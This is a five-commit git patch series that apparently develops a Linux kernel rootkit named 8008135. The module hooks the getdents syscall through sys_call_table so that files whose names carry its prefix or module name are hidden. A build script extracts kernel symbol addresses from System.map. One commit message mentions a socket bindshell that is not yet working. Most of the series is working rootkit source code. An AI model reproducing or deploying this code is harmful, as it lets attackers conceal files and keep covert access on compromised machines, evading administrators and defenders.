From 15b13a399a3dbef2e6a484817308f731e10fc8b9 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Mon, 18 Nov 2019 11:22:34 +0100 Subject: [PATCH 1/5] Adding gitignore --- .gitignore | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..07ec48c --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +*.anjuta* +*.out +*.a +*.ko +*.o +*.*~ From 48717aa477cafa0da6abe58e5eff91842ee0b057 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Mon, 18 Nov 2019 11:27:29 +0100 Subject: [PATCH 2/5] Updated gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 07ec48c..98b2346 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ *.ko *.o *.*~ +8008135 From 85eb771fa527e2760492f087cce007a504ae36be Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Tue, 19 Nov 2019 15:20:53 +0100 Subject: [PATCH 3/5] Update Makefile, Adding more fileext to .gitignorey --- .gitignore | 12 ++++++++++-- 8008135.c | 47 ++++++++++++++++++++++++++++++++++++++++++----- Makefile | 31 +++++-------------------------- 3 files changed, 57 insertions(+), 33 deletions(-) diff --git a/.gitignore b/.gitignore index 98b2346..364a1fd 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,15 @@ + *.anjuta* + +*.mod.* +8008135 *.out *.a *.ko *.o -*.*~ -8008135 + +*~ +*.symvers +*.order +.tmp_versions/ +*.cmd diff --git a/8008135.c b/8008135.c index ac6725b..1778941 100644 --- a/8008135.c +++ b/8008135.c @@ -17,10 +17,47 @@ * with this program. If not, see . */ -#include -int main() -{ - printf("Hello world\n"); - return (0); +/**** Includes *************************************************************** +*******************************************************************************/ +#include +#include +#include + + +/**** Modinfo **************************************************************** +*******************************************************************************/ + +MODULE_LICENSE("GPLv3"); +MODULE_AUTHOR("JanKoernerEnterprises"); +MODULE_DESCRIPTION("8008135"); +MODULE_VERSION("0.1"); + +/**** var ******************************************************************** +*******************************************************************************/ +static char *name = "8008135"; + + +/*** FUNCTION **************************************************************** +* NAME: init_8008135 +* DESCRIPTION: initializing Kernel Module +* PARAMETERS: - +* RETURNS: int +*******************************************************************************/ +static int __init init_8008135(void) { + printk(KERN_INFO "Loading %s into Kernel", name); + return 0; +} + +/*** FUNCTION **************************************************************** +* NAME: exit_8008135 +* DESCRIPTION: unloading Kernel Module +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +static void __exit exit_8008135(void) { + printk(KERN_INFO "Unloading %s from Kernel", name); } +// Setting pointers to init-/exit-functions +module_init(init_8008135); +module_exit(exit_8008135); diff --git a/Makefile b/Makefile index dad9fa4..a5507a8 100644 --- a/Makefile +++ b/Makefile @@ -1,30 +1,9 @@ +obj-m+=8008135.o -## Created by Anjuta - -CC = gcc -CFLAGS = -g -Wall -OBJECTS = 8008135.o -INCFLAGS = -LDFLAGS = -Wl,-rpath,/usr/local/lib -LIBS = - -all: 8008135 - -8008135: $(OBJECTS) - $(CC) -o 8008135 $(OBJECTS) $(LDFLAGS) $(LIBS) - -.SUFFIXES: -.SUFFIXES: .c .cc .C .cpp .o - -.c.o : - $(CC) -o $@ -c $(CFLAGS) $< $(INCFLAGS) - -count: - wc *.c *.cc *.C *.cpp *.h *.hpp +all: + make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules clean: - rm -f *.o + make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean + -.PHONY: all -.PHONY: count -.PHONY: clean From 27b3fe226be62ae92706cacd32b6d842f0f3c941 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Thu, 21 Nov 2019 03:00:44 +0100 Subject: [PATCH 4/5] Adding eclipse file extensions to gitignore --- .gitignore | 4 ++- 8008135.anjuta | 37 ------------------------ 8008135.c => src/8008135.c | 0 create_sysgen.sh => src/create_sysgen.sh | 0 4 files changed, 3 insertions(+), 38 deletions(-) delete mode 100644 8008135.anjuta rename 8008135.c => src/8008135.c (100%) rename create_sysgen.sh => src/create_sysgen.sh (100%) diff --git a/.gitignore b/.gitignore index be19253..99252c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,8 @@ sysgen.h *.anjuta* - +*.*project +*.settings +*.ur-safe *.mod.* 8008135 *.out diff --git a/8008135.anjuta b/8008135.anjuta deleted file mode 100644 index 390fe09..0000000 --- a/8008135.anjuta +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - - - - - - - - - diff --git a/8008135.c b/src/8008135.c similarity index 100% rename from 8008135.c rename to src/8008135.c diff --git a/create_sysgen.sh b/src/create_sysgen.sh similarity index 100% rename from create_sysgen.sh rename to src/create_sysgen.sh From 062fdebeaec7689a4c65cb2e4068e3f0e56eafde Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Thu, 21 Nov 2019 03:02:37 +0100 Subject: [PATCH 5/5] Changing Folder Structures and extending the Makefile for Needs Added an 'src' dir with subfolders headers, include, libs Extending Makefile, so that all the Files get included for the build. Also adding the "load" option for make, which loads the module (has to be built before) as well as the "unload" option which unloads the module. The "all" option now automatically builds the sysgen.h from the script, it doesn't have to be executed in forehand anymore. Also, some Variables got added for better readability and changeability. After the socket bindshell didnt work so far, I added some DEBUG Kernel prints to debug the issue that sometimes the files to be hidden get displayed as "?" Also, a few Functions for debugging have been added - but I was too tired to add them to the collection and use them instead of ```printk``` --- Makefile | 40 ++++++++++++++++++--- src/8008135.c | 71 +++++++++++-------------------------- src/create_sysgen.sh | 15 +++++--- src/headers/8008135.h | 66 ++++++++++++++++++++++++++++++++++ src/include/headers/utils.h | 43 ++++++++++++++++++++++ 5 files changed, 176 insertions(+), 59 deletions(-) create mode 100644 src/headers/8008135.h create mode 100644 src/include/headers/utils.h diff --git a/Makefile b/Makefile index c9e395d..b18503c 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,38 @@ -obj-m += 8008135.o +# Module name +MNAME := 8008135 -modules: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules +# Build +MODULEDIR := /lib/modules/$(shell uname -r) +BUILDDIR := $(MODULEDIR)/build +KERNELDIR := $(MODULEDIR)/kernel + +# Source files +SRCS_S := src +LIBS_S := src/libs +INCL_S := src/include + +# Header files +SRCS_H := $(PWD)/$(SRCS_S)/headers +LIBS_H := $(PWD)/$(LIBS_S)/headers +INCL_H := $(PWD)/$(INCL_S)/headers + +obj-m += $(MNAME).o +# Core +$(MNAME)-y += src/$(MNAME).o + +# Includes for header files etc +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) + +all: + $(shell $(SRCS_S)/create_sysgen.sh) + $(MAKE) -C $(BUILDDIR) M=$(PWD) modules + +load: + insmod $(MNAME).ko + +unload: + rmmod $(MNAME) + clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean + -rm $(SRCS_H)/sysgen.h + $(MAKE) -C $(BUILDDIR) M=$(PWD) clean diff --git a/src/8008135.c b/src/8008135.c index 97b67e4..cf253f5 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -17,50 +17,9 @@ * with this program. If not, see . */ -/**** Includes *************************************************************** +/**** includes ***************************************************************** *******************************************************************************/ -#include -#include -#include -#include -#include -#include -#include "sysgen.h" - - -/**** Defines ***************************************************************** -*******************************************************************************/ - -#define GETDENTS_SYSCALL_NUM 78 -#define WRITE_PROTECT_FLAG (1<<16) - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) - -/**** Modinfo **************************************************************** -*******************************************************************************/ - -MODULE_LICENSE("GPLv3"); -MODULE_AUTHOR("JanKoernerEnterprises"); -MODULE_DESCRIPTION("8008135"); -MODULE_VERSION("0.1"); - -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; - -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); - +#include "8008135.h" /**** var ******************************************************************** *******************************************************************************/ @@ -72,8 +31,8 @@ sys_getdents_t sys_getdents_orig = NULL; * PARAMETERS: - * RETURNS: - *******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, unsigned int count) { int boff; struct linux_dirent* ent; @@ -85,7 +44,7 @@ asmlinkage long sys_getdents_new(unsigned int fd, if (ret <= 0) { return ret; } - + dbuf = (char*)dirent; // go through the entries, looking for one that has our prefix @@ -96,12 +55,25 @@ asmlinkage long sys_getdents_new(unsigned int fd, // if it has hide prefix or module name anywhere, hide it if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) || (strstr(ent->d_name, MODULE_NAME) != NULL)) { - +#if defined DEBUG + printk("\n hide prefix or mod name contained!\n"); + printk("\n ret %ld\n ", ret); + printk("\n dbuf %d\n" , dbuf); + printk("\n"); + printk(ent->d_name); +#endif // remove this entry by copying everything after it forward // and adjust the length reported - memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); +#if defined DEBUG + printk("\n reclen %u \n", ent->d_reclen); +#endif + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); ret -= ent->d_reclen; +#if defined DEBUG + printk("\n ret after change %ld\n ", ret); +#endif } else { // on to the next entry boff += ent->d_reclen; @@ -155,7 +127,6 @@ static void __exit exit_8008135(void) { printk(KERN_INFO "Old syscall back\n"); } - // Setting pointers to init-/exit-functions module_init(init_8008135); module_exit(exit_8008135); diff --git a/src/create_sysgen.sh b/src/create_sysgen.sh index 7892adf..50c4126 100755 --- a/src/create_sysgen.sh +++ b/src/create_sysgen.sh @@ -1,14 +1,19 @@ -#!/bin/bash +#!/usr/bin/env bash +SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" +SRCS_H="$SCRIPTPATH""/headers" +SGENH="$SRCS_H""/sysgen.h" + smap="/boot/System.map-$(uname -r)" -echo -e "#pragma once" > ./sysgen.h -echo -e "#include " >> ./sysgen.h +echo -e "#pragma once" > "$SGENH" +echo -e "#include " >> "$SGENH" symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline -echo -e "void** sys_call_table = (void**)0x$1;" >> ./sysgen.h +[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> ./sysgen.h +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file diff --git a/src/headers/8008135.h b/src/headers/8008135.h new file mode 100644 index 0000000..82df99e --- /dev/null +++ b/src/headers/8008135.h @@ -0,0 +1,66 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +#ifndef SRC_HEADERS_8008135_H +#define SRC_HEADERS_8008135_H +/**** Includes *************************************************************** +*******************************************************************************/ +#include +#include +#include +#include +#include +#include +#include "sysgen.h" + + +/**** Defines ***************************************************************** +*******************************************************************************/ + +#define GETDENTS_SYSCALL_NUM 78 +#define WRITE_PROTECT_FLAG (1<<16) + +#define HIDE_PREFIX "8008135." +#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +/**** Modinfo **************************************************************** +*******************************************************************************/ + +MODULE_LICENSE("GPLv3"); +MODULE_AUTHOR("JanKoernerEnterprises"); +MODULE_DESCRIPTION("8008135"); +MODULE_VERSION("0.1"); + +/**** type ******************************************************************* +*******************************************************************************/ +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; // d_reclen is the way to tell the length of this entry + char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. +}; + +typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + + +#endif /* SRC_HEADERS_8008135_H */ diff --git a/src/include/headers/utils.h b/src/include/headers/utils.h new file mode 100644 index 0000000..f29fac2 --- /dev/null +++ b/src/include/headers/utils.h @@ -0,0 +1,43 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/**** Debugging *************************************************************** +*******************************************************************************/ + +#ifndef SRC_INCLUDE__HEADERS_UTILS_H_ +#define SRC_INCLUDE_HEADERS_UTILS_H_ +#define DEBUG_ENABLED 1 + +/**** Debugging *************************************************************** +*******************************************************************************/ + +/* variadic macro for debug messages */ +#define debug(str, ...) \ +if (DEBUG_ENABLED) { \ + pr_info("[ 8008135 ] [ %s ] " str "\n", \ + __func__, ##__VA_ARGS__); \ +} + +#define alert(str, ...) \ +if (DEBUG_ENABLED) { \ + pr_warn("[ 8008135 ] [ %s ] " str "\n", \ + __func__, ##__VA_ARGS__); \ +} + +#endif /* SRC_INCLUDE_HEADERS_UTILS_H_ */